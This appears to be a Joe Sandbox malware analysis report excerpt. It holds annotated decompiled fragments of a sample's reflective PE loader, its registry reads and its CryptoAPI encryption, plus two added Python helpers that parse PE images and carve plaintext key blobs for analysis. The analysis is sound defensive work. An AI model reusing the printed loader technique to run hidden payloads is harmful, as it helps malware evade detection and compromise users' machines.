                • Opcode Fuzzy Hash: 7b299467c1191aa44f5753ce3dc9cfb7aa030f959e0af23ba158f211b26fedf4
                • Instruction Fuzzy Hash: CA019E32920229FFDB219FE4CC04AAABBB9EF04344F410525ED01A7160E773D919C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			// Converts the SDDL string _a4 into a security descriptor and stores it in a SECURITY_ATTRIBUTES
                			// kept in three globals: 0x404188 nLength = 0xc (sizeof), 0x40418c lpSecurityDescriptor,
                			// 0x404190 bInheritHandle = 0. Arguments in call order: StringSecurityDescriptor = _a4,
                			// StringSDRevision = 1 (SDDL_REVISION_1), SecurityDescriptor = 0x40418c, SecurityDescriptorSize = NULL.
                			// L00401682 is the thunk for ConvertStringSecurityDescriptorToSecurityDescriptorA (see APIs below);
                			// the BOOL it leaves in eax is returned.
                			E00401D3C(void* __eax, intOrPtr _a4) {
                
                				 *0x404190 =  *0x404190 & 0x00000000; // bInheritHandle = FALSE
                				_push(0);
                				_push(0x40418c);
                				_push(1);
                				_push(_a4);
                				 *0x404188 = 0xc; // executed; nLength = sizeof(SECURITY_ATTRIBUTES)
                				L00401682(); // executed
                				return __eax;
                			}



                Listing address range: 0x00401d3c to 0x00401d5f

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Frees a block from the private heap whose handle E02225006 stored at 0x222a2d8.
                			E022261DA(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x222a2d8, 0, _a4); // executed
                				return _t2;
                			}




                Listing address range: 0x022261e6 to 0x022261ec

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 5a538a9449121d03c4a82c7d43f89ec9cd0ae56e07593fc6e9e70b1652a9e2d0
                • Instruction ID: 932ecd7694f3834ecaa1a11aa556e8dfaa29136ac9067949727c603e9eb1bd26
                • Opcode Fuzzy Hash: 5a538a9449121d03c4a82c7d43f89ec9cd0ae56e07593fc6e9e70b1652a9e2d0
                • Instruction Fuzzy Hash: 1DB01271980200BBCB314B80FE0CF057A21A750B00F225911B3080007082730474FF15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Allocates _a4 bytes (flags 0, so no zero-fill) from the heap whose handle is stored at 0x404160.
                			E004012E6(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
                				return _t2;
                			}




                Listing address range: 0x004012f2 to 0x004012f8

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                 			E00401BA9(void* _a4) {
                 				char _t2;
                 
                 				// releases a block from the same heap (*0x404160) that E004012E6 allocates from
                 				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
                 				return _t2;
                 			}

                 • Addresses: 0x00401bb5 to 0x00401bbb

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                 			E004012FB(void* __eax) {   // __eax: the embedded, still file-aligned PE image that is about to be loaded
                 				char _v8;
                 				void* _v12;
                 				void* __edi;
                 				void* _t18;
                 				long _t24;
                 				long _t26;
                 				long _t29;
                 				intOrPtr _t40;
                 				void* _t41;
                 				void* _t42;
                 				void* _t44;
                 
                 				_t41 = __eax;
                 				_t16 =  *0x404180;
                 				// *(e_lfanew + image + 0x50) is IMAGE_OPTIONAL_HEADER.SizeOfImage. With k = *0x404180 - 0x43174ac4 the
                 				// expression reads (SizeOfImage + k) & ~k (taking ! as bitwise NOT). If *0x404180 holds 0x43175ac3, the
                 				// seed the injected module keeps at 0x222a344, then k == 0xFFF and this is plain page rounding.
                 				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                 				// Third argument: 0x43175ac3 + 0xbce8a57d wraps to 0x40 == PAGE_EXECUTE_READWRITE under the same assumption.
                 				// E00401202 resolves its own imports via GetModuleHandleA/GetProcAddress (see the subcall list) and returns
                 				// the new image base in _v8 and a small context in _v12; a non-zero return means the allocation failed.
                 				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                 				if(_t18 != 0) {
                 					_t29 = 8;   // ERROR_NOT_ENOUGH_MEMORY
                 					goto L8;
                 				} else {
                 					_t40 = _v8;   // base of the new image
                 					_t29 = E00401BC4(_t33, _t40, _t41);   // (rounded size, destination, source); no API calls are listed for it, consistent with copying the image into place
                 					if(_t29 == 0) {
                 						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;   // IMAGE_NT_HEADERS of the mapped copy
                 						_t24 = E00401000(_t40, _t44); // executed; import resolution (LoadLibraryA in the subcall list)
                 						_t29 = _t24;
                 						if(_t29 == 0) {
                 							_t26 = E004014CF(_t44, _t40); // executed; per-section page protections (two VirtualProtect calls in the subcall list)
                 							_t29 = _t26;
                 							if(_t29 == 0) {
                 								_push(_t26);   // lpReserved = 0
                 								_push(1);      // DLL_PROCESS_ATTACH
                 								_push(_t40);   // hinstDLL = new base
                 								// *(NT + 0x28) is AddressOfEntryPoint: the mapped module's DllMain is invoked directly, no loader involved
                 								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                 									_t29 = GetLastError();
                 								}
                 							}
                 						}
                 					}
                 					_t42 = _v12;
                 					// two callbacks stored in the context from E00401202 run on its first field, then the context is freed
                 					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                 					E00401BA9(_t42);
                 					L8:
                 					return _t29;
                 				}
                 			}

                 • Addresses: 0x00401303 to 0x0040139e

                APIs
                  • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                  • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                  • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                  • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                • GetLastError.KERNEL32(?,?), ref: 00401379
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                • String ID:
                • API String ID: 3135819546-0
                • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                Uniqueness

                Uniqueness Score: -1.00%
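
The loader above dereferences three header fields (e_lfanew at DOS+0x3c, SizeOfImage at NT+0x50, AddressOfEntryPoint at NT+0x28) and then maps, relinks and protects the image before calling its entry point as DllMain. As an added illustration, not code from the sample or from Joe Sandbox, the Python below walks a constructed PE32 image with those same offsets, lays it out at its RVAs in a bytearray that stands in for the allocated region, and derives the PAGE_* protection a per-section VirtualProtect pass would apply. The sample image, the page_round helper (the value the seed arithmetic reduces to if *0x404180 holds 0x43175ac3) and the protection mapping are the example's own assumptions; the loader's allocation and import-resolution code is not reproduced.

```python
"""Added example, not code from the sample or from Joe Sandbox: walk a PE32 image
with the offsets E004012FB dereferences, lay it out at its RVAs, and derive the
PAGE_* protection a VirtualProtect pass would apply per section."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def section_protection(characteristics):
    """IMAGE_SECTION_HEADER.Characteristics -> (PAGE_* name, value for VirtualProtect)."""
    x = bool(characteristics & IMAGE_SCN_MEM_EXECUTE)
    w = bool(characteristics & IMAGE_SCN_MEM_WRITE)
    r = bool(characteristics & IMAGE_SCN_MEM_READ)
    if x:
        return ("PAGE_EXECUTE_READWRITE", 0x40) if w else ("PAGE_EXECUTE_READ", 0x20) if r else ("PAGE_EXECUTE", 0x10)
    return ("PAGE_READWRITE", 0x04) if w else ("PAGE_READONLY", 0x02) if r else ("PAGE_NOACCESS", 0x01)


def page_round(size, page=0x1000):
    """(size + 0xFFF) & ~0xFFF; assumption: what the seed arithmetic in E004012FB reduces to."""
    return (size + page - 1) & ~(page - 1)


def parse_pe32(image):
    """Read the fields the loader uses: e_lfanew (DOS+0x3c), SizeOfImage (NT+0x50),
    AddressOfEntryPoint (NT+0x28), SizeOfHeaders (NT+0x54) and the section table."""
    (nt,) = struct.unpack_from("<I", image, 0x3C)                  # IMAGE_DOS_HEADER.e_lfanew
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    if struct.unpack_from("<H", image, nt + 0x18)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    (n_sections,) = struct.unpack_from("<H", image, nt + 0x06)
    (opt_size,) = struct.unpack_from("<H", image, nt + 0x14)
    (entry_rva,) = struct.unpack_from("<I", image, nt + 0x28)      # AddressOfEntryPoint
    (size_of_image,) = struct.unpack_from("<I", image, nt + 0x50)  # SizeOfImage
    (size_of_headers,) = struct.unpack_from("<I", image, nt + 0x54)
    sections = []
    for i in range(n_sections):
        off = nt + 0x18 + opt_size + 40 * i                         # IMAGE_SECTION_HEADER[i]
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        (chars,) = struct.unpack_from("<I", image, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "characteristics": chars})
    return {"e_lfanew": nt, "entry_rva": entry_rva, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "sections": sections}


def map_image(image):
    """Copy headers and sections to their RVAs in a page-rounded SizeOfImage buffer and
    return the (name, rva, size, protection) tuples a per-section VirtualProtect pass needs."""
    info = parse_pe32(image)
    mapped = bytearray(page_round(info["size_of_image"]))
    hdr = info["size_of_headers"]
    mapped[:hdr] = image[:hdr]
    protections = []
    for s in info["sections"]:
        raw = image[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        mapped[s["va"]:s["va"] + len(raw)] = raw
        protections.append((s["name"], s["va"], max(s["vsize"], s["raw_size"]),
                            section_protection(s["characteristics"])[0]))
    return info, mapped, protections


def build_sample_image():
    """Constructed two-section PE32 DLL (not the sample): .text RX holding a
    five-byte stub at the entry point, .data RW holding a short string."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)                       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x10000000)                   # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)               # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)               # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                           # NumberOfRvaAndSizes

    def sec(name, vsize, va, raw_size, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)

    text = b"\x55\x8b\xec\x5d\xc3".ljust(0x200, b"\xcc")             # push ebp; mov ebp,esp; pop ebp; ret
    data = b"cfg\0".ljust(0x200, b"\0")
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)
               + sec(b".text", 0x10, 0x1000, 0x200, 0x200, 0x60000020)   # CODE | EXECUTE | READ
               + sec(b".data", 0x10, 0x2000, 0x200, 0x400, 0xC0000040))  # INITIALIZED_DATA | READ | WRITE
    return headers.ljust(0x200, b"\0") + text + data


SAMPLE_IMAGE = build_sample_image()

if __name__ == "__main__":
    info, mapped, prots = map_image(SAMPLE_IMAGE)
    base = 0x10000000                                                # pretend the allocation landed at ImageBase
    print("DllMain would be called at", hex(base + info["entry_rva"]), "with (base, 1, 0)")
    for name, rva, size, prot in prots:
        print(f"{name:6} rva={rva:#07x} size={size:#05x} -> {prot}")
```

Running it on a real dump of the unpacked region (the 0x400000 .sdmp files above are "based on PE: true") only needs the file bytes in place of SAMPLE_IMAGE; a section whose characteristics map to PAGE_EXECUTE_READWRITE is the usual hint that the image was built to be patched in memory.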

                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0071B265
                Memory Dump Source
                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: a5ee145f302fdda1ff531744e25b6ea6107e5eaefac0b340e55c60c89c12b58d
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 2B112B79A00208EFDB01DF98C985E99BBF5AF08751F158094F9489B362D375EA90DB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                 			E022233F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {   // __edi receives the resulting wide string
                 				void* _t21;
                 				void* _t22;
                 				signed int _t24;
                 				intOrPtr* _t26;
                 				void* _t27;
                 
                 				_t26 = __edi;
                 				if(_a4 == 0) {
                 					L2:
                 					// 0x80000002 == HKEY_LOCAL_MACHINE; E022258BD returns the value data in _a4 and its byte length in _a12
                 					_t27 = E022258BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                 					if(_t27 == 0) {
                 						_t24 = _a12 >> 1;   // byte length -> WCHAR count
                 						if(_t24 == 0) {
                 							_t27 = 2;   // ERROR_FILE_NOT_FOUND for an empty value
                 							HeapFree( *0x222a2d8, 0, _a4);
                 						} else {
                 							_t21 = _a4;
                 							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;   // force a terminating NUL over the last WCHAR
                 							 *_t26 = _t21;
                 						}
                 					}
                 					L6:
                 					return _t27;
                 				}
                 				// when _a4 is non-zero the value is first fetched through E02222839 (SysFreeString in its subcall list,
                 				// in line with the report's "reads registry keys via WMI" signature); the direct HKLM read is the fallback
                 				_t22 = E02222839(_a4, _a8, _a12, __edi); // executed
                 				_t27 = _t22;
                 				if(_t27 == 0) {
                 					goto L6;
                 				}
                 				goto L2;
                 			}

                 • Addresses: 0x022233f1 to 0x0222345e

                APIs
                  • Part of subcall function 02222839: SysFreeString.OLEAUT32(00000000), ref: 0222289C
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,0222528E,?,004F0053,02BD9218,00000000,?), ref: 02223454
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                 • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID:
                • API String ID: 3806048269-0
                • Opcode ID: cace4db11b6c5b9e4e1b6b955fd40f0aef6f528f96b02637efd89b940b946ac6
                • Instruction ID: 22b344014f4b86e694551e1549f2e34ade3246fc238fce33f625e8f29115db27
                • Opcode Fuzzy Hash: cace4db11b6c5b9e4e1b6b955fd40f0aef6f528f96b02637efd89b940b946ac6
                • Instruction Fuzzy Hash: DA018B3280062ABBCB23CF84CC00FEA3B65EF14750F448065FE089A124D732D978DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                 			E02225063(void* __ecx, void* __edx, void* _a4, void* _a8) {   // _a4: data buffer, _a8: string whose length bounds the transform
                 				void* _t13;
                 				void* _t21;
                 
                 				_t11 =  &_a4;
                 				_t21 = 0;
                 				__imp__( &_a8);   // lstrlen (see APIs); the decompiler dropped the import name
                 				// E02221508: CryptAcquireContextW(PROV_RSA_AES, CRYPT_VERIFYCONTEXT), a 16-byte key imported from a 0x1C-byte
                 				// PLAINTEXTKEYBLOB, then CryptSetKeyParam(KP_IV); a CryptoAPI block-cipher transform done in place on _a4
                 				_t13 = E02221508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                 				if(_t13 == 0) {
                 					_t21 = E022233DC(_a8 + _a8);   // RtlAllocateHeap of twice the input length
                 					if(_t21 != 0) {
                 						E022222EA(_a4, _t21, _t23);   // re-encodes the result into the larger buffer (encoding not shown in the report)
                 					}
                 					E022261DA(_a4);   // releases the input buffer
                 				}
                 				return _t21;   // encoded output, or 0 on failure
                 			}

                 • Addresses: 0x0222506b to 0x022250b6

                APIs
                • lstrlen.KERNEL32(00000000,00000000,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 02225074
                  • Part of subcall function 02221508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02225088,00000001,02223ECE,00000000), ref: 02221540
                  • Part of subcall function 02221508: memcpy.NTDLL(02225088,02223ECE,00000010,?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740), ref: 02221559
                  • Part of subcall function 02221508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02221582
                  • Part of subcall function 02221508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0222159A
                  • Part of subcall function 02221508: memcpy.NTDLL(00000000,7491C740,02BD9600,00000010), ref: 022215EC
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                 • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                 • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 17fff232a9e5e369dc1b54db237e0274493d84783d74de0ba4039d8717db5abf
                • Instruction ID: db6e76236d5a32016f166acee2c69e3017f77525b48e26e495fe181f53767f79
                • Opcode Fuzzy Hash: 17fff232a9e5e369dc1b54db237e0274493d84783d74de0ba4039d8717db5abf
                • Instruction Fuzzy Hash: 7BF0303611012DBACF116E95DC00DDA3B6EEF88360B008021FD098A114DA73D6699BA0
                Uniqueness

                Uniqueness Score: -1.00%
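
The subcall list above pins down the CryptoAPI setup inside E02221508: CryptAcquireContextW with provider type 0x18 (PROV_RSA_AES) and flags 0xF0000000 (CRYPT_VERIFYCONTEXT), a 0x10-byte memcpy, CryptImportKey with a 0x1C-byte blob, and CryptSetKeyParam with parameter 1 (KP_IV). Twelve bytes of BLOBHEADER plus cbKeySize and a 16-byte key is exactly 0x1C, so the key goes in as a PLAINTEXTKEYBLOB. The Python below is an added example, not code from the sample or the report: it builds and parses that blob layout and carves such blobs out of a buffer, which is how the key the sample copies into the blob would be pulled from one of the process dumps listed above. The ALG_ID inside the sample's blob is not visible in the report; CALG_AES_128 is assumed here because PROV_RSA_AES with a 16-byte key fits it, and the key, IV and dump bytes are constructed.

```python
"""Added example, not the sample's or the report's code: PLAINTEXTKEYBLOB layout
behind the 0x1C-byte CryptImportKey call, plus a carver for such blobs."""
import struct

PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
PROV_RSA_AES = 0x18                 # provider type seen in CryptAcquireContextW
CRYPT_VERIFYCONTEXT = 0xF0000000    # flags seen in CryptAcquireContextW
KP_IV = 1                           # parameter seen in CryptSetKeyParam
ALG_NAMES = {0x6601: "CALG_DES", 0x6603: "CALG_3DES", 0x660E: "CALG_AES_128",
             0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256", 0x6801: "CALG_RC4"}
BLOB_HDR = "<BBHII"                 # bType, bVersion, reserved, aiKeyAlg, cbKeySize
BLOB_HDR_LEN = struct.calcsize(BLOB_HDR)   # 12; 12 + 16 == 0x1C


def build_plaintext_key_blob(key, alg_id):
    """The buffer CryptImportKey expects for a raw symmetric key."""
    return struct.pack(BLOB_HDR, PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob):
    """Inverse of the above, with the sanity checks CryptImportKey itself applies."""
    if len(blob) < BLOB_HDR_LEN:
        raise ValueError("blob shorter than its header")
    btype, ver, _reserved, alg, keylen = struct.unpack_from(BLOB_HDR, blob, 0)
    if btype != PLAINTEXTKEYBLOB or ver != CUR_BLOB_VERSION:
        raise ValueError("not a PLAINTEXTKEYBLOB")
    key = blob[BLOB_HDR_LEN:BLOB_HDR_LEN + keylen]
    if len(key) != keylen:
        raise ValueError("truncated key material")
    return {"alg_id": alg, "alg": ALG_NAMES.get(alg, f"ALG_ID {alg:#06x}"), "key": key}


def carve_plaintext_key_blobs(buf):
    """Scan a dump for PLAINTEXTKEYBLOB headers with a known ALG_ID and a plausible
    key length; returns (offset, algorithm name, key) per hit. This recovers the key
    the code memcpy's into the blob without re-implementing the decryption."""
    magic = bytes([PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, 0])
    hits = []
    pos = buf.find(magic)
    while pos != -1:
        if pos + BLOB_HDR_LEN <= len(buf):
            alg, keylen = struct.unpack_from("<II", buf, pos + 4)
            if alg in ALG_NAMES and keylen in (8, 16, 24, 32) and pos + BLOB_HDR_LEN + keylen <= len(buf):
                hits.append((pos, ALG_NAMES[alg], buf[pos + BLOB_HDR_LEN:pos + BLOB_HDR_LEN + keylen]))
        pos = buf.find(magic, pos + 1)
    return hits


# Constructed test data: made-up key and IV, not values from the sample.
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_IV = bytes(range(0x20, 0x30))
SAMPLE_BLOB = build_plaintext_key_blob(SAMPLE_KEY, 0x660E)       # CALG_AES_128 (assumption)
SAMPLE_DUMP = b"\xcc" * 7 + SAMPLE_BLOB + SAMPLE_IV + b"\x00" * 5

if __name__ == "__main__":
    print("blob length:", hex(len(SAMPLE_BLOB)))                   # 0x1c, the CryptImportKey argument above
    for off, alg, key in carve_plaintext_key_blobs(SAMPLE_DUMP):
        print(f"offset {off:#x}: {alg} key={key.hex()}")
```

The carver keys on the fixed four-byte header (bType 0x08, bVersion 0x02, reserved 0) rather than on the key bytes, so it also finds blobs built for other CryptoAPI algorithms; since the sample sets an IV right after importing, the 16 bytes following a hit are worth checking as the IV, but nothing in the report fixes where the IV lives relative to the key.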

                APIs
                  • Part of subcall function 00501FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00501C63), ref: 00501FDE
                  • Part of subcall function 00501FCF: GetVersion.KERNEL32(?,00501C63), ref: 00501FED
